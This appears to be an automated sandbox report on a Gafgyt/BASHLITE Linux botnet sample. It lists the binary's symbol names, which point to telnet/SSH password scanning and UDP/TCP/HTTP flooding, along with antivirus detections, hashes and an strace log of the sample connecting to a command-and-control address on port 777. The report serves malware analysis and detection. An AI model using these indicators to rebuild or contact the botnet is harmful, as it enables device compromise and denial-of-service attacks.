__syscall_error.c, , poll.c, , fclose.c, , fopen.c, , fseeko.c, , fseeko64.c, , _adjust_pos.c, , _fopen.c, , _cs_funcs.c, , fgets.c, , fflush_unlocked.c, , fgets_unlocked.c, , strcmp.c, , strncat.c, , rawmemchr.c, , strspn.c, , strdup.c, , ntop.c, , inet_pton4, , xdigits.3285, , inet_ntop4, , encodeh.c, , decodeh.c, , encodeq.c, , lengthq.c, , decodea.c, , read_etc_hosts_r.c, , llseek.c, , tolower.c, , fgetc_unlocked.c, , strcasecmp.c, , encoded.c, , decoded.c, , lengthd.c, , _READ.c, , _rfill.c, , _trans2r.c, , __fini_array_end, , __fini_array_start, , __init_array_end, , __preinit_array_end, , _GLOBAL_OFFSET_TABLE_, , __init_array_start, , __preinit_array_start, , __read_etc_hosts_r, , UpdateNameSrvs, , __GI_execve, , __libc_sigaction, , strcpy, , __GI_fcntl64, , recvLine, , __socketcall, , __GI___ctype_b, , __GI_memchr, , BINS7, , __GI___glibc_strerror_r, , waitpid, , __open_nameservers, , __GI_fopen, , getrlimit, , ioctl, , _stdio_openlist_use_count, , __GI_initstate_r, , __GI_sigaction, , BINS13, , strtok_r, , __GI___C_ctype_toupper_data, , __GI_time, , getgid, , sysconf, , BIN, , stdout, , random, , __GI_strdup, , __GI_getpagesize, , getdtablesize, , __GI_h_errno, , contains_fail, , __length_question, , __GI___ctype_toupper, , __GI_strcasecmp, , advance_telstate, , __GI_tolower, , BINS3, , recv, , connect, , __encode_question, , __GI___uClibc_fini, , numpids, , __encode_header, , __GI_strncat, , __pthread_mutex_lock, , initConnection, , __sigdelset, , __GI_clock_getres, , __uClibc_fini, , memrchr, , geteuid, , inet_pton, , __GI_vsnprintf, , memmove, , __bsd_signal, , __GI_strpbrk, , __stdio_trans2r_o, , munmap, , __GI_setsockopt, , __libc_stack_end, , __GI_fclose, , __GI_wcsnrtombs, , _uintmaxtostr, , __libc_fcntl, , atol, , _h_errno, , getRandomPublicIP, , getc_unlocked, , __ctype_b, , __GI_random_r, , errno, , getegid, , read_until_response, , __GI_sbrk, , SSH_Usernames, , zprintf, , __GI___uClibc_init, , execve, , getpagesize, , getpid, , __GI_lseek64, , setstate_r, , fgets, , getHost, , __libc_getpid, , BINS2, , wildString, , __xpg_strerror_r, , SendUDP, , fcntl64, , prctl, , memcpy, , TelnetScanner, , makeRandomStr, , getRandomIP, , __GI_fputs_unlocked, , execl, , __GI_fgets, , creat, , _stdio_openlist_dec_use, , sclose, , __libc_select, , _ppfs_init, , __GI___C_ctype_toupper, , __GI_fgetc_unlocked, , __libc_nanosleep, , trim, , __GI_fgets_unlocked, , FTP1, , __pthread_mutex_init, , tolower, , getuid, , system, , __open_etc_hosts, , malloc, , isatty, , sleep, , __GI_atol, , vsnprintf, , __dns_lookup, , __GI_read, , __C_ctype_tolower, , random_r, , __dso_handle, , clock_getres, , gethostbyname_r, , tcpcsum, , reset_telstate, , BINS5, , socket, , select, , _pthread_cleanup_pop_restore, , __GI_wcrtomb, , __GI___libc_fcntl, , __GI_memset, , isspace, , __stdio_seek, , mempcpy, , __GI_strcoll, , __GI_write, , __ctype_toupper, , __libc_read, , _string_syserrmsgs, , BINS11, , __GI_open, , __GI_strchr, , __searchdomain, , __GI_tcgetattr, , __environ, , mmap, , wcsnrtombs, , makeIPPacket, , sockprintf, , __GI_inet_ntoa, , send, , __fgetc_unlocked, , abort, , __GI_fcntl, , __GI_wcsrtombs, , __GI_fwrite_unlocked, , SendSTD, , BINS10, , __GI_getgid, , srandom_r, , _init, , __GI_inet_ntoa_r, , __GI_setstate_r, , RandomPythonRange, , strtol, , __libc_lseek64, , strnlen, , rawmemchr, , TFTP2, , __GI_mempcpy, , __malloc_state, , __GI___C_ctype_b_data, , __sigaddset, , Payload, , nanosleep, , __GI_send, , h_errno, , __pthread_mutex_unlock, , wait4, , __register_frame_info_bases, , __GI_exit, , __app_fini, , csum, , __exit_cleanup, , Mirai_Usernames, , RemoveTempDirs, , __GI_execl, , __GI_srandom_r, , __GI___ctype_tolower, , write, , environ, , __GI_close, , getBuild, , __resolv_lock, , kill, , fputs_unlocked, , __pthread_mutex_trylock, , Bot_Killer_Binarys, , BINS6, , __GI_brk, , __GI_nanosleep, , __GI_strtok, , _stdio_openlist, , __GI_sigprocmask, , inet_addr, , TFTP1, , ntohl, , __GI_fseek, , __GI_setreuid, , ourIP, , chdir, , fseeko, , _stdio_openlist_del_count, , connectTimeout, , __raise, , setsockopt, , bsd_signal, , fseek, , __GI_kill, , __GI_strcmp, , __GI_memmove, , setstate, , __decode_dotted, , __stdio_READ, , memchr, , __GI_toupper, , __pthread_initialize_minimal, , __GI_recv, , __stdin, , stdin, , __GI_isatty, , strcasestr, , _start, , __deregister_frame_info_bases, , strstr, , __GI_ioctl, , init_rand, , rand, , BINS1, , signal, , read, , __decode_header, , __GI___h_errno_location, , __GI_memcpy, , strcoll, , wcsrtombs, , _stdio_user_locking, , BINS8, , strncpy, , strcasecmp, , htonl, , sendto, , Python_Temp_Directory, , __C_ctype_toupper, , __GI___C_ctype_b, , Telnet_Passwords, , __GI_gethostbyname_r, , __GI_strncpy, , MiraiIPRanges, , __libc_send, , __GI___xpg_strerror_r, , currentServer, , __GI___C_ctype_tolower, , Mirai_Passwords, , __GI_getrlimit, , bcopy, , __GI_strcpy, , __GI_inet_ntop, , strtok, , getEndianness, , ClearHistory, , __stdio_adjust_position, , malloc_trim, , __GI_poll, , _vfprintf_internal, , __GI_strcasestr, , Busybox_Payload, , fork, , Python_File_Location, , __stdio_rfill, , strncat, , setresuid, , __GI_sleep, , sigaction, , __GI_gethostbyname, , SendTCP, , _dl_phdr, , __GI_getc_unlocked, , __GI___libc_fcntl64, , __uClibc_init, , __GI_munmap, , _store_inttype, , __length_dotted, , __getpagesize, , __GI_random, , __syscall_error, , __uclibc_progname, , __GI_getegid, , __GI_wait4, , __malloc_lock, , __uClibc_main, , sbrk, , __rtld_fini, , __GI_fork, , strdup, , __libc_close, , __GI_getpid, , inet_aton, , _pthread_cleanup_push_defer, , index, , processCmd, , __sigismember, , fopen, , __bss_start, , setreuid, , __libc_open, , get_telstate_host, , memset, , __GI_socket, , main, , MiraiScanner, , __glibc_strerror_r, , listFork, , __GI___C_ctype_tolower_data, , __stdio_fwrite, , negotiate, , srand, , initstate, , fclose, , __syscall_rt_sigaction, , ntohs, , inet_ntoa, , getppid, , tcgetattr, , __C_ctype_tolower_data, , time, , __libc_system, , __GI_abort, , poll, , seteuid, , __get_hosts_byname_r, , __stdio_init_mutex, , __GI__exit, , strcmp, , advances2, , __nameserver, , data_start, , __GI_sysconf, , __h_errno_location, , Telnet_Usernames, , matchPrompt, , SSH_Passwords, , __C_ctype_b_data, , __GI_inet_pton, , gethostbyname, , _stdio_fopen, , _fini, , __GI_chdir, , __vfork, , __GI_mmap, , contains_success, , sprintf, , __get_pc_thunk_bx, , strerror_r, , __GI_select, , __libc_waitpid, , socket_connect, , __GI_waitpid, , _stdio_term, , __decode_answer, , __GI_signal, , stderr, , fails, , commServer, , vfork, , __C_ctype_b, , srandom, , _ppfs_setargs, , __GI_sendto, , __libc_fork, , __atexit_lock, , scanPid, , rand_cmwc, , __GI_setresuid, , advances, , __libc_fcntl64, , getsockopt, , __GI_fseeko64, , fflush_unlocked, , __stdio_wcommit, , contains_string, , __GI___fgetc_unlocked, , __nameservers, , fwrite_unlocked, , BINS_HOST_IP, , inet_ntoa_r, , __pagesize, , _stdio_openlist_add_lock, , __GI_getdtablesize, , contains_response, , access, , _edata, , __stdout, , __GI_memrchr, , __GI_fflush_unlocked, , __GI_strstr, , __searchdomains, , _end, , htons, , _sigintr, , _ppfs_prepargs, , __GI_strspn, , fgetc_unlocked, , initstate_r, , __GI_connect, , __curbrk, , __libc_poll, , _dl_phnum, , _fpmaxtostr, , __errno_location, , _stdlib_strto_l, , __GI___libc_open, , exit, , __stdio_WRITE, , _stdio_init, , __GI_geteuid, , inet_ntop, , brk, , __C_ctype_toupper_data, , _dl_aux_init, , _errno, , atoi, , successes, , BINS9, , _stdio_openlist_del_lock, , __GI_inet_aton, , fgets_unlocked, , _exit, , szprintf, , strspn, , __libc_recv, , __libc_creat, , strlen, , lseek64, , PythonRanges, , open, , Temp_Directorys, , toupper, , __libc_write, , __malloc_consolidate, , _ppfs_parsespec, , __GI_strtol, , __GI_getuid, , __GI_strtok_r, , __GI_errno, , BINS4, , BINS12, , __libc_sendto, , __stdio_trans2w_o, , __GI_vfork, , strchr, , __GI_rawmemchr, , __GI_raise, , __data_start, , __GI_inet_addr, , __GI_seteuid, , __encode_dotted, , __GI_strnlen, , _Jv_RegisterClasses, , macAddress, , __GI___errno_location, , fcntl, , setuid, , read_with_timeout, , __GI_atoi, , fseeko64, , __GI_sprintf, , __ctype_tolower, , wcrtomb, , close, , __libc_connect, , __GI_strlen, , mainCommSock, , pids, , SendHTTP, , strpbrk, , _load_inttype, , raise, , useragents, , free, , sigprocmask,
Present
True check_circle
Anti-Debug
Ptrace
False cancel
Anti-disasm
False cancel
Entry Point
Address
0x8048168
Suspicious
False cancel
Embedded ELF
List
None
Identified
0
Program Header
Size
32
Number
3
Offset
52
Section Header
Size
40
Number
16
Offset
78984
AVclass
gafgyt
1
VirusTotal
md5
74b4c9ff209fe609737c69b326ee7d46
sha1
da0acff001489d9b5a5cf1e6c63bd63ee922dd09
SCANS (DETECTION RATE = 44.07%)
AVG
result: ELF:DDoS-Y [Trj]
update: 20180828
version: 18.4.3895.0
detected: True check_circle

CMC
update: 20180828
version: 1.1.0.977
detected: False cancel

MAX
update: 20180828
version: 2017.11.15.1
detected: False cancel

Bkav
update: 20180828
version: 1.3.0.8876
detected: False cancel

K7GW
update: 20180828
version: 10.60.28202
detected: False cancel

ALYac
update: 20180828
version: 1.1.1.5
detected: False cancel

Avast
result: ELF:DDoS-Y [Trj]
update: 20180828
version: 18.4.3895.0
detected: True check_circle

Avira
result: DDOS/LNX.Lightaidra.ynghy
update: 20180828
version: 8.3.3.6
detected: True check_circle

Baidu
update: 20180828
version: 1.0.0.2
detected: False cancel

Cyren
update: 20180828
version: 6.0.0.4
detected: False cancel

DrWeb
result: Linux.BackDoor.Fgt.707
update: 20180828
version: 7.0.33.6080
detected: True check_circle

GData
result: Linux.Trojan.Gafgyt.A
update: 20180828
version: A:25.18279B:25.13076
detected: True check_circle

Panda
update: 20180828
version: 4.6.4.2
detected: False cancel

VBA32
update: 20180828
version: 3.33.0
detected: False cancel

VIPRE
update: 20180828
version: 69154
detected: False cancel

Zoner
update: 20180827
version: 1.0
detected: False cancel

AVware
update: 20180823
version: 1.6.0.52
detected: False cancel

ClamAV
result: Unix.Malware.Agent-6318128-0
update: 20180828
version: 0.100.1.0
detected: True check_circle

Comodo
update: 20180828
detected: False cancel

F-Prot
update: 20180828
version: 4.7.1.166
detected: False cancel

Ikarus
result: Trojan.Linux.Tsunami
update: 20180828
version: 0.1.5.2
detected: True check_circle

McAfee
result: Linux/Gafgyt.h
update: 20180828
version: 6.0.6.653
detected: True check_circle

Rising
result: Trojan.Linux/Gafgyt!1.AD1C (CLASSIC)
update: 20180828
version: 25.0.0.24
detected: True check_circle

Sophos
result: Linux/DDoS-BI
update: 20180828
version: 4.98.0
detected: True check_circle

Yandex
update: 20180827
version: 5.5.1.3
detected: False cancel

Zillya
update: 20180827
version: 2.0.0.3625
detected: False cancel

Arcabit
update: 20180828
version: 1.0.0.833
detected: False cancel

Babable
update: 20180822
version: 9107201
detected: False cancel

TACHYON
update: 20180828
version: 2018-08-28.02
detected: False cancel

Tencent
result: Backdoor.Linux.Gafgyt.aa
update: 20180828
version: 1.0.0.1
detected: True check_circle

ViRobot
update: 20180828
version: 2014.3.20.0
detected: False cancel

Ad-Aware
update: 20180828
version: 3.0.5.370
detected: False cancel

AegisLab
result: Trojan.Linux.Generic.m!c
update: 20180828
version: 4.2
detected: True check_circle

Emsisoft
update: 20180828
version: 2018.4.0.1029
detected: False cancel

F-Secure
update: 20180828
version: 11.0.19100.45
detected: False cancel

Fortinet
result: ELF/Gafgyt.LT!tr.bdr
update: 20180828
version: 5.4.247.0
detected: True check_circle

Jiangmin
result: Backdoor.Linux.hhm
update: 20180828
version: 16.0.100
detected: True check_circle

Kingsoft
update: 20180828
version: 2013.8.14.323
detected: False cancel

Symantec
result: Linux.Gafgyt
update: 20180828
version: 1.7.0.0
detected: True check_circle

AhnLab-V3
result: Linux/Mirai.Gen
update: 20180828
version: 3.13.1.21616
detected: True check_circle

Antiy-AVL
result: Trojan[Backdoor]/Linux.Gafgyt.af
update: 20180828
version: 3.0.0.1
detected: True check_circle

Kaspersky
result: HEUR:Backdoor.Linux.Gafgyt.af
update: 20180828
version: 15.0.1.13
detected: True check_circle

Microsoft
result: DDoS:Linux/Lightaidra
update: 20180828
version: 1.1.15200.1
detected: True check_circle

Qihoo-360
result: Win32/Trojan.DDoS.1be
update: 20180828
version: 1.0.0.1120
detected: True check_circle

TheHacker
update: 20180824
version: 6.8.0.5.3581
detected: False cancel

ZoneAlarm
result: HEUR:Backdoor.Linux.Gafgyt.af
update: 20180828
version: 1.0
detected: True check_circle

ESET-NOD32
result: a variant of Linux/Gafgyt.UN
update: 20180828
version: 17956
detected: True check_circle

TrendMicro
result: Possible_BASHLITE.SMLBE1
update: 20180828
version: 10.0.0.1040
detected: True check_circle

BitDefender
update: 20180828
version: 7.2
detected: False cancel

K7AntiVirus
update: 20180828
version: 10.61.28206
detected: False cancel

Avast-Mobile
result: ELF:DDoS-S [Trj]
update: 20180828
version: 180827-06
detected: True check_circle

Malwarebytes
update: 20180828
version: 2.1.1.1115
detected: False cancel

TotalDefense
update: 20180828
version: 37.1.62.1
detected: False cancel

CAT-QuickHeal
update: 20180828
version: 14.00
detected: False cancel

NANO-Antivirus
update: 20180828
version: 1.0.116.23366
detected: False cancel

MicroWorld-eScan
update: 20180828
version: 14.0.297.0
detected: False cancel

SUPERAntiSpyware
update: 20180828
version: 5.6.0.1032
detected: False cancel

McAfee-GW-Edition
result: Linux/Gafgyt.h
update: 20180828
version: v2017.3010
detected: True check_circle

TrendMicro-HouseCall
result: Possible_BASHLITE.SMLBE1
update: 20180828
version: 9.950.0.1006
detected: True check_circle

total
59
sha256
4e99b1006ed58305f2d0b222b3dd92032661fee310da503cd4adc0443dc31c76
scan_id
4e99b1006ed58305f2d0b222b3dd92032661fee310da503cd4adc0443dc31c76-1535463068
resource
74b4c9ff209fe609737c69b326ee7d46
positives
26
scan_date
2018-08-28 13:31:08
verbose_msg
Scan finished, information embedded
response_code
1
Ltrace
Trace

Strace
Trace
4291execve"./malware"["./malware"][/* 15 vars */] 0
4291ioctl0TCGETS0xffa28880) = -1 ENOTTY (Inappropriate ioctl for device -1 ENOTTY (Inappropriate ioctl for device)
4291ioctl1TCGETS0xffa28880) = -1 ENOTTY (Inappropriate ioctl for device -1 ENOTTY (Inappropriate ioctl for device)
4291prctlPR_SET_NAME"\0/\0[ CONNECTED ]" 0
4291timeNULL 1571351692
4291getpid 4291
4291timeNULL 1571351692
4291getpid 4291
4291fork 4292
4291wait442924291 wait4(4292,
4292fork 4293
4292exit0 ?
4291[{WIFEXITEDs) && WEXITSTATUS(s) == 0}]0NULL 4292
4291---4291 --- SIGCHLD {si_signo=SIGCHLDsi_code=CLD_EXITEDsi_pid=4292si_uid=1000si_status=0si_utime=0si_stime=0} --0} ---
4291exit0 ?
4293chdir"/" 0
4293setuid320) = -1 EPERM (Operation not permitted -1 EPERM (Operation not permitted)
4293setresuid32-10-1) = -1 EPERM (Operation not permitted -1 EPERM (Operation not permitted)
4293rt_sigactionSIGPIPE{SIG_IGN, {SIG_IGN, [PIPE], [PIPE]SA_RESTORER|SA_RESTART0x8052faf}{SIG_DFL, {SIG_DFL, [], []0}8 0
4293fork 4294
4293exit0 ?
4294socketPF_INETSOCK_STREAMIPPROTO_IP 3
4294fcntl3F_GETFL) = 0x2 (flags O_RDWR 0x2 (flags O_RDWR)
4294fcntl3F_SETFLO_RDWR|O_NONBLOCK 0
4294connect3{sa_family=AF_INET, {sa_family=AF_INET, sin_port=htons(777), sin_port=htons(777), sin_addr=inet_addr("107.170.96.217")}sin_addr=inet_addr("107.170.96.217")}16) = -1 EINPROGRESS (Operation now in progress -1 EINPROGRESS (Operation now in progress)
4294_newselect4NULL[3]NULL 0 (Timeout)
4294rt_sigprocmaskSIG_BLOCK[CHLD][]8 0
4294rt_sigactionSIGCHLDNULL{SIG_DFL, {SIG_DFL, [], []0}8 0
4294rt_sigprocmaskSIG_SETMASK[]NULL8 0
4294nanosleep{5,{5, 1571351692}1571351692}0xffa27814 0
4294fork 4308
4294exit0 ?
4308close3 0
4308socketPF_INETSOCK_STREAMIPPROTO_IP 3
4308fcntl3F_GETFL) = 0x2 (flags O_RDWR 0x2 (flags O_RDWR)
4308fcntl3F_SETFLO_RDWR|O_NONBLOCK 0
4308connect3{sa_family=AF_INET, {sa_family=AF_INET, sin_port=htons(777), sin_port=htons(777), sin_addr=inet_addr("107.170.96.217")}sin_addr=inet_addr("107.170.96.217")}16) = -1 EINPROGRESS (Operation now in progress -1 EINPROGRESS (Operation now in progress)
4308_newselect4NULL[3]NULL4308 _newselect(4, NULL, [3], NULL, {30, 8}

Analysis
Ltrace
Statically-compiled samples cannot be ltraced.

Reason
Timeout

Status
Sucess

Strace
Success

Results
True check_circle

DNS
Query

Response

TCP
Info
computer localhost:55132 arrow_forward 107.170.96.217:777
computer localhost:55130 arrow_forward 107.170.96.217:777

UDP
Info
computer localhost:5353 arrow_forward help_outline 224.0.0.251:5353

HTTP
Info

Summary
DNS
False cancel

TCP
True check_circle

UDP
True check_circle

HTTP
False cancel

Binary
RF
confidence: 100.00%
suspicious: True check_circle
MLP
confidence: 99.98%
suspicious: True check_circle
SVM
confidence: 98.80%
suspicious: True check_circle
Add to Collection
Download